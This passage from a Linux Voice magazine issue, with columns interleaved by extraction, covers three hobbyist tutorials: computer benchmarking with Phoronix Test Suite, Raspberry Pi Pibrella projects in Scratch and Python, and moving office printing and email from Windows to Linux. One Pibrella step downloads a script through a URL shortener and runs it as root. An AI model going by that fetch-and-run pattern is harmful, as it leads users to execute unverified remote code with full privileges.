basics thrown in. As you read this,             look at what the benefits of the       programmed very easily.               to add graphical niceties to your
another stash is being written for your         newer version are, and how you         Ben Everard pokes inside and          phone apps. Apparently, it’s much
                                                can make your older programs run       discovers how its elegance hides      easier than Java programming
enjoyment, and so the cycle continues.
                                                on it.                                 it’s power.                           used to be.
ben@linuxvoice.com



                                                                  www.linuxvoice.com                                                                                75
     TUTORIAL PERFORMANCE BENCHMARKING



                             PERFORMANCE BENCHMARKING:
          TUTORIAL
                             HOW FAST IS YOUR COMPUTER?
                             Put your computer through its paces to find out
   BEN EVERARD
                             whether its performance is up to scratch.


                             C
                                      omputers come in all shapes and sizes, from      go to www.webkit.org/perf/sunspider/sunspider.html
 WHY DO THIS?                         the diminutive Raspberry Pi up to room-sized     and hit Start Now. This will run a variety of JavaScript
 • Try hardware before                supercomputers. They’re all capable of           benchmarks, and output a score in milliseconds
   you buy to verify its
   performance.              performing the same tasks, but some do them much          (lower is better). It’s a really easy test to run, and is
 • Get to know the strain    more quickly than others. Sometimes it’s useful to        useful for comparing speed on different architectures
   that your system          know just how much quicker or slower a particular         (it should run on ARM-powered phones and 64-bit
   resources are under.      computer is, and for this there are benchmarks.           desktops). You also don’t have to install any software,
 • Gain bragging rights at      Benchmarks are just programs that we can time          so you can easily use it to compare performance on
   your next LUG meeting.
                             (this is usually automatic) to see how fast they run on   devices you’re thinking of buying.
                             different computers. In principal, you could use almost       However, the fact that it’s running in JavaScript is a
                             any software to do this, but each bit of software will    disadvantage as well as an advantage. The particular
                             behave a bit differently. Some software contains a lot    JavaScript engine can have a huge effect on how well
                             of floating point operations, while other software may    it runs. If you want to confirm this, just try running it in
                             need a lot of RAM, and other software may hit the         a few different browsers on the same computer.
                             hard drive a lot. The trick to benchmarking, then, is     SunSpider is really designed for benchmarking
HardInfo can also be used
                             knowing what you want to test and selecting a             JavaScript engines, not computers, and there’s no real
to generate HTML reports
on performance, but          benchmark that has the right characteristics.             solution to this problem other than using the same
they’re not as detailed as      Perhaps the most popular question in                   version of the same browser on every computer you
those created by Phoronix    benchmarking is how processor power varies                want to test.
Test Suite.                  between devices. There’s a very easy way to test this:
                                                                                       HardInfo
                                                                                       The next easiest benchmarks are in the HardInfo
                                                                                       program. This is in most distro’s repositories, so you
                                                                                       should be able to install it with your package manager.
                                                                                           If you open it (type hardinfo on the command line if
                                                                                       it doesn’t appear in the applications menu), you’ll see a
                                                                                       variety of options. Most of them are for reporting
                                                                                       information about the hardware on your system.
                                                                                       These can be useful in diagnosing hardware
                                                                                       problems, but we’re not interested in them here. At the
                                                                                       bottom of the list on the left-hand side, you’ll see a
                                                                                       series of benchmarks. Click on them to run them (it
                                                                                       may take a little while on some machines). It’ll give
                                                                                       you the performance of the current machine
                                                                                       compared to a 1.5 GHz Celeron M machine. We often
                                                                                       use this for our benchmarking because it works well
                                                                                       on ARM as well as x86-based machines. However, the
                                                                                       options are a bit limited.
                                                                                           If you’re serious about your benchmarking, there’s
                                                                                       one open source tool that really does it better than the
                                                                                       rest, and that’s the Phoronix Test Suite. You can grab
                                                                                       it from www.phoronix-test-suite.com/?k=downloads
                                                                                       as either a Deb package, or a tarball. If you’re installing
                                                                                       the tarball, you just need to extract it and run sudo
                                                                                       ./install-sh. This will copy all the files into the
                                                                                       appropriate directories. It’s written in PHP, which is
                                                                                       interpreted, so there’s nothing to compile.
                                                                                           Before we get too far into the Phoronix Test Suite,
                                                                                       we should issue a word of warning: the software can



76                                                          www.linuxvoice.com
                                                                               PERFORMANCE BENCHMARKING TUTORIAL


be a little confusing and is a little flaky. Some tests
don’t install or run properly, and sometimes it behaves
a little strangely. Once you’ve used it a few times, the
first of these isn’t too much of a problem, and you’ll
discover which tests work and which ones don’t.
   Phoronix Test Suite is based around tests. You can
see what’s available with the command:
phoronix-test-suite list-available-tests
  This lists all the tests and suites that can be run, but
many of them will need additional parts to be
downloaded (often hundreds of megabytes worth)
before you can run them.
  To run one of these, just enter phoronix-test-suite
run <test-name>. For example, to run a simple
OpenSSL benchmark (that shouldn’t need too much
to download) run:
phoronix-test-suite run pts/openssl
  This should download and install everything it
needs (it may ask you to enter you password to
enable this). If it downloads everything, but then
doesn’t run leaving you with the error:
[PROBLEM] You must enter at least one test, suite, or result   upload the benchmark to openbenchmarking.org.
identifier to run.                                             Alternatively, if you find a run on openbenchmarking.
                                                                                                                         It turns out that an i7
just run the command again (remember, we said it               org and you want to compare your computer to it, just
                                                                                                                         desktop is much faster
was flaky).                                                    click on Compare Performance (in the blue box) to         than a Centrino laptop.
   It will give you a few options about how to display         find the command (or take the code from the URL).         To find out just how
the results. Select Y to save the results and enter a             Comparing a single test like this is useful, but to    much faster, go to http://
name, unique name and description. Then it’ll run the          really compare computers though, it’s better to try a     openbenchmarking.org/
test three times to see how well your computer                 range of benchmarks rather than just a single one.        result/1405262-PL-
performs. At the end, it’ll give you the option to open        This is what suites are for. To see what suites are       1405259PL73.
the test results in your browser. Press Enter to accept        available, run:
the default (Yes), and it’ll start your browser and load       phoronix-test-suite list-available-suites
an HTML file with the results. For a single test run on          Most of these suites take quite a long time to run
a single machine, this isn’t particularly interesting. It      (often several hours), so don’t start them when you’re
makes a nice graph, but with only a single datapoint,          busy. Some of these
this doesn’t really show any more than the raw data.
However, this interface really comes into its own when
                                                               are designed to put a
                                                               specific feature under
                                                                                             “Some benchmarks are
using it to compare runs on different machines                 the spotlight (such as        designed to put a specific
against each other. For example, to compare your
OpenSSL benchmarks against the desktop this article
                                                               the graphics suites),
                                                               while others are
                                                                                             feature under the spotlight.”
was written on, run:                                           designed to get a
phoronix-test-suite benchmark 1405253-PL-SSLDESKTO72           balanced picture of performance. The pts/favorites
  You get the openbenchmarking code to run your                suite gives a good overall picture of performance. You
own comparisons if you say Yes to the option to                can test this out by running it in the same way as you
                                                               would run a test with:
                                                               phoronix-test-suite run pts/favorites
                                                                 However, just as you can compare the performance
                                                               of two tests using openbenchmarking.org, you can
                                                               also compare the performance of two suites. To pit
                                                               your computer against the one this article was written
                                                               on and the our Centrino laptop in digital combat, run:
                                                               phoronix-test-suite benchmark 1405262-PL-1405259PL73
                                                                   If you get an error about missing dependencies, try
                                                               selecting option 3 to reattempt the install. May the
                                                               best computer win!
The Phoronics Test Suite also has a graphical mode (that           The favorites suite is fine for a general test, but
can be started with phoronics-test-suite gui) that may be      there are far more tests and suites available, so if
easier if you’re not used to working on the command line,      you’re serious about performance-testing computers,
but we found the terminal more stable and easier to use.       it’s worth taking the time to get to know them.



                                                                 www.linuxvoice.com                                                               77
     TUTORIAL PIBRELLA



                               RASPBERRY PI: MAKE GAMES
           TUTORIAL
                               WITH A PIBRELLA AND SCRATCH
                               Use a physical device to create interactive Python and Scratch
  LES POUNDER
                               programs for fun and profit, but mostly for fun.


                               U
                                         nderstanding and predicting how a program
 WHY DO THIS?
                                         works is part of the new Computing
 • Discover how simple it is             curriculum which is being introduced in
   to make hardware obey
   your commands.              September of this year. It is also a key part in
 • Use the graphical           understanding how a computer thinks and how it
   Scratch programming         uses logic. Children across the UK will need to
   language in a practical     understand two types of programming languages;
   application.
                               one must be a visual language, the other a textual
 • Reprise Benny Hill's role
   in the Italian Job.         language.
                                  For this issues tutorial we will explore two projects
                               using Pimoroni and Cyntech’s latest board, the
                               Pibrella, which we reviewed in Issue 3. The projects for
 INSTALLING THE                this issue are used to highlight the basic aspect of       The Pibrella board has a big red button, three LEDS and a
 PIBRELLA BOARD                control, and our first project – a simulation of traffic   buzzer. It's perfect for basic hardware interface messing.
 The Pibrella board is         lights – is an ideal starting point for a commonly seen
 designed to fit over all
 of the Raspberry Pi GPIO      aspect of our lives. Our second project is a dice            After a few moments you will see the Idle Python
 pins. The board should        simulator, where we can control the main part of the       editor on your screen.
 simply push on with little    program but we introduce a random element to spice
 resistance and the black
 rubber pad should rest on     things up.                                                 Scratch
 the capacitor next to the                                                                The standard version of Scratch does not have the
 micro USB power socket.       Python                                                     capability to interact with external components, but
                               To use the Pibrella board with our Raspberry Pi, we        this special version maintained by Simon Walters
                               first need to install an extra module that will enable     (found on Twitter as @cymplecy) enables you to use
                               Python and Scratch to talk to the board. To do this we     many different add-on boards and the GPIO directly.
                               are going to use a Python packaging tool called pip.          To install ScratchGPIO5plus on your Raspberry Pi,
                                  First, open a terminal. In the terminal we need to      type in the following in a terminal:
                               ensure that our list of packages is up to date, so type    wget http://goo.gl/Pthh62 -O isgh5.sh
                               the following, remembering to press Enter afterwards.        This will download a shell script that contains the
                               sudo apt-get update                                        instructions to install Scratch on your Raspberry Pi.
                                 You will now see lots of on-screen activity, which       Now that we have the shell script, we need to use it,
                               means that your list of software packages is being         so in the same terminal type in the following.
                               updated. When this is complete, type the following to      sudo bash isgh5.sh
                               install pip, the Python package management tool. If          You will be prompted for your password, once you
                               you're asked to confirm any changes or actions,            have typed this in press Enter and you will see lots of
                               please read the instructions carefully and only answer     commands and actions appear on the screen. Let it
                               Yes if you are happy.                                      complete these tasks, perhaps pop off for a cup of tea
                               sudo apt-get install python-pip                            and then return when it is done.
                                 Now it's time to use pip to install the pibrella           When everything is installed, you will see two new
                               package for Python, so type the following:                 icons on your desktop: ScratchGPIO5 and
                               sudo pip install pibrella                                  ScratchGPIO5plus. What we are interested in is
                                 After a few minutes the pibrella module for Python       ScratchGPIO5plus, as this is the version of Scratch
                               should be installed on your Raspberry Pi.                  that will enable us to use Pibrella. Double-click on the
                                 We’ll be using Python 2 for our Python code in this      icon to launch ScratchGPIO5plus.
                               tutorial, and we need to use an editor called Idle to
                               write our code. The Pibrella board attaches to the         Simulate traffic lights
                               GPIO (General Purpose Input/Output), and in order for      In the real world, traffic lights are used to control the
                               us to use it with Idle we need to launch the Idle          flow of traffic through a town or city. On your Pibrella
                               application using the sudo command, like so:               you will see three Light Emitting Diodes (LED) that we
                               sudo idle                                                  can use to simulate our own traffic lights using



78                                                               www.linuxvoice.com
                                                                                                                PIBRELLA TUTORIAL


Scratch and Python. Traffic lights control traffic via           You will see a large number of broadcast blocks,
the red, amber and green lights which are                     and we use those blocks to communicate with the
programmed in these two sequences.                            components on the Pibrella. For example, to turn on
  Green to Amber and then to Red.                             the Red LED we use broadcast RedOn and to turn it
  Red and Amber together, and then to Green.                  off we use broadcast RedOff. Each of these
   You will see that the sequence is different in reverse,    broadcast blocks will need to be created as they are
and this enables drivers who are colour blind to know         not already in the Control palette. Have a go at
where they are in the sequence. So how can we create          creating your own sequence.
this in our code? Well let's first see how it can be             This is the main functionality that will control our
achieved in Scratch.                                          Pibrella and recreate a typical UK traffic light using
                                                              Scratch. You can see that there are other code
Scratch                                                       snippets in the column; these relate to the output
In Scratch we can see three columns. These are:               visible in the stage area. Our car can drive across the
   The palette of blocks, where all of the blocks that        screen when the light is green, but when the light
   make up our program can be found; they are                 changes to amber the car will slow down and finally
   colour-coded to enable children to quickly identify        when the light is red the car will come to a stop. I
   where a block is from.                                     added these elements to introduce another element
   A script-building area, where we can drag our blocks       of control, in that our Pibrella board can influence the        PRO TIP
   of code to build our program.                              car on screen. To take this further, see if you can work    In these tutorials we used
                                                                                                                          the Pip package manager
   Finally there is a stage area that shows the output        out how to add another car to the stage and replicate       for Python. Pip takes a
   of our program.                                            the code that we created, but alter the speed of the        lot of the hard work out
   In our code we need to first tell Scratch that we are      car to make it faster or slower.                            of managing your Python
                                                                                                                          packages and enables
using the Pibrella board. You'll find this in the Variables                                                               you to quickly update
palette; it's called Set AddOn to 0. Change this to Set       Python                                                      your packages should
AddOn to PiBrella and leave it in the palette for now.        Our Python code for this project is quite similar to the    a new version be made
                                                                                                                          available. You can learn
Now we need to create a piece of code that tells              Scratch code that we earlier created. Let’s take a look     more about Pip and the
Scratch that when the green flag is clicked, the add-on       at the code, section by section. We start with              Python Package Index at
Pibrella board is to be used, and that all of the inputs      importing some external libraries, in this case pibrella    https://pypi.python.org/
                                                                                                                          pypi.
and outputs should be turned off. The When Green              and time. Pibrella’s library enables us to use the board
Flag Clicked block is located in the Control palette. We      in our Python code. The time library enables us to
next need to drag the Set AddOn to PiBrella from the          control the speed at which our program runs.
Variables palette and place it under the Green Flag           import pibrella
block. Lastly for this section we need to create a            import time
Broadcast block called AllOff that tells Pibrella that all        Next we have two variables that control the delays
of its inputs and outputs should be turned off.               in our code. Delay is used to control the time that the
   Now that we've told Scratch that we're using the           green and the red LED are illuminated for. Sequence is
Pibrella board, we need to write the code that controls       used to control the time that the amber LED is
the main part of our program. Our logic is as follows         illuminated for.
When the green flag is clicked                                delay = 10                                                 Perhaps you could also
                                                                                                                         add a horn sound to
Wait until the big red button is pressed                      sequence = 2
                                                                                                                         this car, so that it waits
Repeat the following 3 times                                     We now move on to a function that groups together       impatiently while the light
            Turn on the Green LED                             all of the steps necessary to turn on and off our LED      is red. You can find the
            Wait 10 seconds                                   and control how long this is to be done for. A function    Sound palette in Scratch,
            Turn off the Green LED                            is a group of instructions that can be called by using     coloured light purple.
            Turn on the Amber LED
            Wait 2 seconds
            Turn off the Amber LED
            Turn on the Red LED
            Wait 10 seconds
            Turn on the Amber LED
            Wait 2 seconds
            Turn off the Amber LED
            Turn off the Red LED
Most of the blocks necessary to complete this project
are in the Control palette, except for our switch sensor
block, which is located in the Sensors palette, and the
green six sided-block, which is a comparison block
from the Operators panel. The green block that you're
looking for is the = block in the Operators palette.



                                                                www.linuxvoice.com                                                                     79
     TUTORIAL PIBRELLA

                  the name of the function (I like to think of a function             print("AMBER & RED TOGETHER")
                  as similar to a macro). It can automate a lot of steps              pibrella.light.amber.on()
                  and makes debugging our code easier as we only                      time.sleep(sequence)
                  have to look at the function and not search through                 pibrella.light.amber.off()
                  our code for any issues. To create a function called                pibrella.light.red.off()
                  traffic_lights you would do as follows.                           You’ll notice that the code under the name of our
                  def traffic_lights():                                           function is indented – this is correct. Python uses
                     Now that we have named our function we have to               indentation to show what code belongs to the
                  tell it what to do when it is used, and this is what the        function, it even applies to loops.
                  code looks like.
                    #Create the sequence                                          Expansion activity
                      #Green on for 10 seconds                                    In our project we used two variables to control the
                      print("GREEN")                                              delay in our light sequence. We can change these
                      pibrella.light.green.on()                                   quite easily, but why not ask the user to change them
                      time.sleep(delay)                                           interactively? Python 2 has a great function called
                      pibrella.light.green.off()                                  raw_input that can add interactive content to your
                      #Amber for 2 seconds                                        project (in Python 3 it is renamed to input). To use
                      print("AMBER")                                              raw_input in place of our current values we can try
                      pibrella.light.amber.on()                                   this.
                      time.sleep(sequence)                                        delay = raw_input("How long should the green and red light be
                      pibrella.light.amber.off()                                  on? ")
                      #Red for 10 seconds.                                        sequence = raw_input("How long should the amber light be on?
                      print("RED")                                                ")
                      pibrella.light.red.on()                                       So now once we start our program we will be asked
                      time.sleep(delay)                                           two questions relating to how long the lights should
                      # Don't turn off the red light until the end of the amber   be on. Answer each of the questions and press enter
                      # sequence.                                                 after entering your answer.


                     2    GENERATING RANDOM OUTPUT: DICE GAME
                  In the first project our expected result and our actual
                  result matched, because we designed our program
                  that way. In the second project, while we will still have
                  an element of control to our program, our actual result
                  will differ as we will be using a random number to
                  simulate throwing a die.
                  When the big red button is pressed
                     Say that the program will pick a random number between 1
                  and 6
                     On the screen tell the player what the number is
                     Flash all of the LED on your Pibrella the same number of     To add bells and whistles, can you can think of a way to
                  times as the random number                                      trigger the cat to dance if you roll a six?
                     For each flash of the LED the on board buzzer will buzz
                    Looking at this logic sequence we can control                 roll. There will also be two options asking if this
                  everything apart from the number that is chosen at              variable applies to all sprites or just this one. For this
                  random – let's build this in Scratch:                           project either option is applicable, so the choice is
                                                                                  yours. Now that we have a variable called roll, let’s
                  Scratch                                                         recreate the dice throw logic.
                  We start with telling Scratch that we're using the                 To assign a value to a variable in Scratch we need
                  Pibrella board and that all of the inputs and outputs           to set a value to the variable. So in our project we Set
                  should be off. This is exactly the same start as Project        roll to… but what do we set it to? Well, we use a block
                  1. Next we see a forever loop, that is watching for us          from the Operators palette that will pick a random
                  to press the big red button; as soon as we press the            number. We drag that block and drop it into the Set
                  button our on-screen cat will say “Let’s roll a 6 sided         block, so now we have a method to randomly pick a
                  dice”. Next our code will set a variable called roll, but       number and store it in our roll variable. Our code now
                  where does this variable live in Scratch? Well if you           moves to show the randomly chosen value via a block
                  click on the Variables palette you will see a button            in the Looks palette. This block, called “Think” creates
                  called “Make a variable”. clicking on this will trigger a       a thought bubble type effect on the screen, just like
                  pop-up asking you to name your variable, so name it             those found in cartoons and comics. We then drop



80                                                      www.linuxvoice.com
                                                                                                                            PIBRELLA TUTORIAL

another block from the Operators palette called “Join”                were not told the result; and two, we can use this to
into the Think block. This now gives us a method to                   debug the code later on in the project.
join our “You roll a" string with the value stored in our               In the print function you can see “The number is
roll variable.                                                        “+str(guess), what this is demonstrating is something
   The last section of our code is a loop that will iterate           called concatenation, or in other words joining
the same number of times as the value of our dice roll                together. The problem that we have is that the text is a
variable. Each time the loop goes round it turns all of               string in Python, but the contents of the variable
the Pibrella LEDs on and beeps the buzzer, then waits                 guess is an integer. In order to concatenate two things
for half a second before turning the LED off, then lastly             they must be of the same type, and that's where str
waiting for half a second before repeating the loop.                  comes in to play. What str does is temporarily convert
   So that's Project 2, our dice game in Scratch. Try it              the contents of our variable from an integer into a
out and see if it works. For extra points, see if you can             string, which we can then join to the string “The
work out how to change our dice to a higher or lower                  number is"
number of sides?                                                        print("The number is "+str(guess))
                                                                         Let's move on to the next section of the function.
Python                                                                Here we use a for loop that instructs the Pibrella to
The structure of our Python code for Project 2 is quite               flash all of the LEDs and play the buzzer to match the
similar to Project 1.                                                 guessed number. This provides a great audio/visual
  We first import the libraries that will add extra                   output to our game and enables us to explore different
functionality to the code. There will be two libraries                methods of output. A loop works by checking to see if
that we have used before, namely pibrella and time.                   a condition is true and if that is correct it looks to see
But you can see a new library called random. The                      what code should be run.
random library enables us to add an element of                           We start the for loop by saying “for every time the
surprise to our dice game, and I’ll show you how that                 loop goes round” and then we tell Python how many
works later in the code.                                              times the loop should go round by saying “start at 0
import random                                                         and finish before you get to the number guessed”. In
import time                                                           Python this is how it looks.
import pibrella                                                         for i in range(0,(guess)):
Now that the imports are completed, we next create a                     We start at 0 rather than 1 because a range will end
function that will handle the main process of the                     before it gets to the chosen number. So if we started
game. This function called dice() is made up of a few                 at 1, the number of flashes would be 1 less than the
sections, I’ll break it down and explain what happens                 guess due to the range ending. So we would then
in each section.                                                      have to add 1 to our guess variable, so it’s easier to
   In this section we create a variable, called guess,                start at 0 and work from there.
which will store the output of random.randint(1,6).                      So now that we have our for loop we need to write
What does that mean? Well, we earlier imported a                      the code to flash our LED and beep our buzzer. We
library called random, and from that library we want to               start with a half-second delay to help our loop run
use a function called randint, or random integer in                   smoothly.
plain English. In Python the syntax is                                    time.sleep(0.5)
  guess = random.randint(1,6)                                            Our next part of the sequence controls turning all of
  Next we want to tell the player what the program                    the LED on and playing a note on the buzzer, waiting
will achieve, and to do this I print a string of text for the         for half a second and then turning the LED and buzzer
player to read.                                                       off. Pibrella has a special function that turns on all of
  print("I'm going to think of a number between 1 and 6 and I         the LEDs without having to individually call them by
will flash the lights on your Pibrella to indicate the number I       their names. Pibrella also has a special function to
chose")                                                               control the note played on the buzzer, but this function
  Now that the program has picked a random                            is different to those that we have encountered before.
number and stored it as a variable we want to tell the                This function can take an argument – in other words
player what the number was. The reason for this is                    we can tell the function what note to play, which in
two fold: one, the game would be no fun if the player                 this case is (1). Here is all the code to control our LED
                                                                      and buzzer.
                                                                          pibrella.light.on()
  Project files
                                                                          pibrella.buzzer.note(1)
  All of the files used in these projects are available via my
                                                                          time.sleep(0.5)
  GitHub repository. GitHub is a marvellous way of storing
  and collaborating on code projects. You can find my GitHub              pibrella.light.off()
  repo at https://github.com/lesp/LinuxVoice_Pibrella.                    pibrella.buzzer.off()
      If you're not a Github user, don't worry you can still
  obtain a zip file that contains all of the project files. The zip    Les Pounder is a maker and hacker specialising in the
  file can be found at https://github.com/lesp/LinuxVoice_             Raspberry Pi and Arduino. Les travels the UK training
  Pibrella/archive/master.zip.                                         teachers in the new computing curriculum and Raspberry Pi.




                                                                        www.linuxvoice.com                                                      81
     TUTORIAL MIGRATE FROM WINDOWS



                               OFFICE MIGRATION:
          TUTORIAL
                               PRINTING AND EMAIL
                               Is your home or work office still stuck on Windows?
MARK DELAHAY
                               Move it to Linux and save time and money.


                               S
                                        OHOs (small office/home offices) and SMEs             Support There are many more support options in
 WHY DO THIS?                           (small/medium enterprises) are in a bit of a bind     the open source world. Paid support is available
 • Free yourself from                   at the moment. Large numbers of organisations         with the bigger distributions, and the support
   Microsoft’s licensing
   costs                       still run Windows XP – so they need to consider their          forums can resolve issues in a time frame so fast
 • Avoid the UI nightmare      options now that Microsoft has ended support for that          that would make commercial help desk staff quake
   that is Windows 8           OS. Doing nothing and continuing to use XP is an               in their boots.
 • Get better performance      option, but it gets riskier as time goes on. Upgrading to       Ideology An increasing number of individuals and
   and security                Windows 8 or converting to Apple is going to be                organisations are embracing not just the
                               expensive, but there is a third way: Linux and open            commercial practicality of Linux, but also the
                               source software.                                               underlying spirit of community and co-operation.
                                  Now, chances are that you already run Linux on
                               your home desktop and maybe a few servers, so                Assess your needs
                               you’re aware that it’s a very capable OS. But we also        Once you or your organisation has decided to explore
                               know that many Linux dabblers find it tough to move          the Linux alternative, the first step is to assess the
                               their home or work office away from Windows. In this         application requirements in detail, which will save a lot
                               tutorial we’ll make the transition easier – and if you’re    of wasted time and re-work later on. There are
                               forced to use Windows at work but would love to              alternatives for almost everything in the FOSS world,
                               move over to Linux, show this guide to your boss!            but you may need to keep bespoke applications and
                                  Before we dive in, however, let’s consider the main       run them using the Wine compatibility layer.
                               benefits of making the switch:                                  Converting an office to Linux is a mammoth job, so
                                  Licensing Here you have direct and indirect costs.        here we’re going to focus on two of the most common
                                  With Windows you have to spend money on the               tasks: printing and email. These are good places to
                                  operating system and office suite, and then add-ons       start in a transition, so we’ll show you that it’s not so
                                  for security. Bigger organisations even have costly       difficult with the right approach. And if you’d like us to
                                  licensing departments and servers, so there’s an          cover other aspects of office migration, drop us a line
                                  indirect cost – manpower.                                 and we’ll expand this into a longer series of tutorials.


                                 1    PRINTING
                               The previous generation of printers attached to PCs          your Linux PC or even a Raspberry Pi print server is
With Linux Mint, setting up
a printer is straightforward   (as opposed to departmental networked laser                  entirely possible, but this is the realm of die-hard
thanks to a GUI tool           printers) were strictly Windows printers, with an awful      tinkerers, as some features may not work properly, like
accessible from the Start      lot of the computing power done on the PC instead of         notifications of paper jams and low ink levels.
menu.                          the printer itself. Attaching these devices directly to      However, most of the current generation of printers are
                                                                                            natively network-orientated with built-in print servers.
                                                                                               Let’s have a look at two printers and how they can
                                                                                            be installed on a fresh copy of Linux Mint 16, Xfce
                                                                                            edition. First is a brand-new HP Office Jet 660 (approx
                                                                                            £130 including fax and scanning features) which has
                                                                                            been configured using its touchscreen and is on the
                                                                                            network ready for action. Secondly we have a legacy
                                                                                            Canon PiXMA iP5000 directly attached via USB.
                                                                                               Printing on Linux is usually handled by CUPS
                                                                                            (formerly an acronym for the Common Unix Printing
                                                                                            System). This is installed by default in Linux Mint, with
                                                                                            its daemon running in the background. Configuration
                                                                                            is either via the web interface at http://127.0.0.1:631
                                                                                            or via the GUI application “system-config-printer” (just
                                                                                            type “printer” into the search box on the start menu to

82                                                             www.linuxvoice.com
                                                                                     MIGRATE FROM WINDOWS TUTORIAL

find it). For simplicity’s sake we recommend using the
GUI application.
   Once the application is open, select Add Printer, and
then (for a network printer) click the Network Printer
drop-down list. You will see your printer there, ready to
be selected. There will be a short wait as the driver is
located and installed, and then all that remains to do is
to name your printer and print out a test page.

No more hunting for drivers
Installation does not get much easier than this, but
how do we fare with an older but perfectly usable USB
printer, like the Canon PIXMA iP5000 mentioned
earlier? The initial process is exactly the same and the
Canon is correctly detected as a USB attached printer.
                                                            The web-based front-end provides an alternative interface to CUPS configuration.
   However, this is where things can go wrong – in
our case the installation process stalled when trying
to find the correct driver. But this did allow us to try    will appear. Choose the driver corresponding to your
the alternative installation process via the CUPS web       model, or one with a close model number if there isn’t
interface on http://127.0.0.1:631. Open that address        an exact match in the driver name, and then perform
in your browser and click Adding Printers and Classes.      a test print. You may need to experiment with two or
   You will see your printer in the Local Printers list,    three drivers before getting the best results.
and when you click on it a drop-down list of drivers           So setting up a printer in Linux isn’t as tough as
                                                            it may seem, and thanks to CUPS you don’t have to
                                                            trawl through random websites to find drivers – CUPS
                                                            is supplied with drivers for hundreds of printers out              PRO TIP
                                                            of the box. Plus, you can access CUPS via a GUI or its          Read up on other
                                                                                                                            migration efforts to
                                                            web-based front end, for added stability.                       get a feeling for what’s
                                                               Of course, some printer vendors are more                     required, such as when
                                                            supportive of Linux than others. If you’re in the market        the city of Munich
                                                                                                                            switched to Linux (see LV
                                                            for a new printer, it’s worth checking online for Linux         issue 2, or read it online
                                                            compatibility before you part with your hard-earned             at www.linuxvoice.com/
                                                            cash, eg at https://help.ubuntu.com/community/                  the-big-switch).
                                                            Printers. This author recommends HP devices for the
Here, the Canon has been identified correctly, and we’re    best Linux compatibility, but always browse the web
prompted for a list of drivers.                             or ask on a forum first.


  2    EMAIL
Out there in the corporate world of inbox overload,         few hours to accomplish. If you are migrating from
email is a daily grind but it’s also a necessary evil for   a Windows Outlook or Outlook Express solution,
doing business. Outlook/Exchange and Office are             there is a cunning plan to ease the pain of migration
Microsoft’s financial engines – these are the               that we’ll demonstrate here. We are going to install
applications that businesses want and need to               Thunderbird first on our legacy Windows machine,
function. Fortunately, Open/LibreOffice can handle          use it to properly create the folder/MBOX file structure
their own when pitted against Microsoft’s mighty            for storing mails, and then move the files to our target
office suite.                                               Linux build.
  Moving from Outlook can be tricky though, as it’s
so tightly integrated with Microsoft’s other Office         Export mail to Thunderbird on the Windows PC
products. A Windows refugee who has used Outlook             1 On the source Windows machine, head over to


for a while to access email from POP3 or IMAP               www.mozilla.org and download and install the
servers is going to end up with many PST files that         Thunderbird email client.
need to be kept and referenced.                              2 Start up Thunderbird. There’s no need to run the


  These PST files store messages and calendar               import wizard that pops up, or set it to the default mail
events, and are in a proprietary format dreamt up           client, and there’s no need to set up any email
by Microsoft. So the first challenge is: how do you         accounts at this stage.
access them? The bad news is that there’s no magic           3 The menu is accessed through the button with


pixie dust available for this and a bit of work is          three horizontal bars on the right-hand side of the task
involved; the good news is that it should take only a       bar. Click Menu > Tools > Import.



                                                              www.linuxvoice.com                                                                         83
     TUTORIAL MIGRATE FROM WINDOWS

Here’s the Local Folders file                                                                 show you the location of where to copy the three
structure after importing                                                                     files from our Windows export procedure in step one
the three files and folders.                                                                  above, eg /home/username/.thunderbird/bqg0cpfv.
                                                                                              default/Mail/Local Folder.
                                                                                                 So copy them into that location, restart Thunderbird,
                                                                                              and you should have your nested folder structure as
                                                                                              you had it on Outlook.

                                                                                              Directly importing PST files
                                                                                              If, for what ever reason, you no longer have access to
                                                                                              a Windows PC with Outlook running and only have
                                                                                              access to the PST files then it is still possible to import
                                                                                              them but it requires a bit more work. This process will
                                                                                              also work for any other mail program that can read
                                                                                              MBOX files, such as Claws.
                                                                                                  The Linux email storage medium of choice is
                                                                                              MBOX. To convert a PST file to MBOX you’ll need a
                                                                                              handy CLI tool called readpst, which is part of pst-
                                                                                              utils). It looks like it is not in active development, but it
                                                                                              does work and it’s the best that we could find.
                                                                                              sudo apt-get install pst-utils
                                                                                                It’s quite straightforward to use readpst. It does
                                                                                              have a number of switches, but only the -u option for
                                                                                              use with Thunderbird is selected here:
                                                                                              readpst -u mypst.pst
                                                                                                The output of readpst is a nested folder structure
                                4  This brings up the “import” pick list, so select “Mail”.   where the top level folder is called mypst (it takes
                                Then you have the option of Outlook, Outlook Express          the name of the .pst file) and inside of which is a
                                or Eudora. It’s wise to make sure that Outlook is not         .mbox file that contains all your precious mail. Each
                                running during this process.                                  subsequent folder and sub-folder is properly named
                                 5 Once the import process has been completed you             as per the folder structure of the original pst file and
                                are left with an additional folder in the Local Folders       also contains a .mbox file.
                                section called Outlook Import or something similar.             Getting this MBOX file into Thunderbird is not
                                On our machine it was named EMAILS. If you right              as straightforward as you think, and requires
                                click on this folder and select Properties, the location      the installation of an add-on by the name of
                                of the files of interest are shown, eg                        ImportExportTools, also available from Mozilla:
                                mailbox:///C:/Documents and Settings/username/                https://addons.mozilla.org/en-US/thunderbird/
                                Application Data/Thunderbird/Profiles/s3e9cqbn.               addon/importexporttools. The installation
                                default/Mail/Local Folder/EMAILS                              instructions on the website are pretty clear and
                                   If you navigate to this location (warning: under           straightforward:
                                Windows XP, Application Data is a hidden folder)                Download and save the file to your hard disk.
                                you will find the three files we need to copy. EMAILS           In Mozilla Thunderbird, open Add-ons from the
                                (the files with no extensions in Thunderbird are the            Tools menu.
                                MBOX mail files), EMAILS.msf (Mail Summary Files)               From the Options button next to the add-on search
                                and finally a folder called EMAILS.sbd, which is the            field, select Install Add-on From File and locate the
                                directory structure of sub folders, each of which               downloaded add-on.
                                contains another MBOX file and msf file. Copy these
                                three files and folders to a USB stick or to a server.

                                Import mail into Thunderbird on the Linux PC
                                If your Linux machine does not ship with Thunderbird
                                then it needs to be installed in the manner best suited
                                to your distribution. For Debian and derivatives the
                                command sudo apt-get install thunderbird will do
                                the trick.
                                   First, add your account(s) as usual, using IMAP
                                instead of POP if possible to make accessing email
                                via several devices less painful and easier to manage.
                                Next, locate the Local Folders icon on the left-hand          ImportExportTools: selecting the correct option at this
                                panel, right-click on it and select Settings. This will       stage will save you a lot of time.



84                                                                www.linuxvoice.com
                                                                                                 MIGRATE FROM WINDOWS TUTORIAL


  Migrating applications
  So we’ve had a good look at printing and email             Microsoft Project is another heavyweight           the strapline for Wine (www.winehq.org) which
  migration – but application incompatibility can also    application, both in terms of performance and cost,   considers itself a compatibility layer rather than
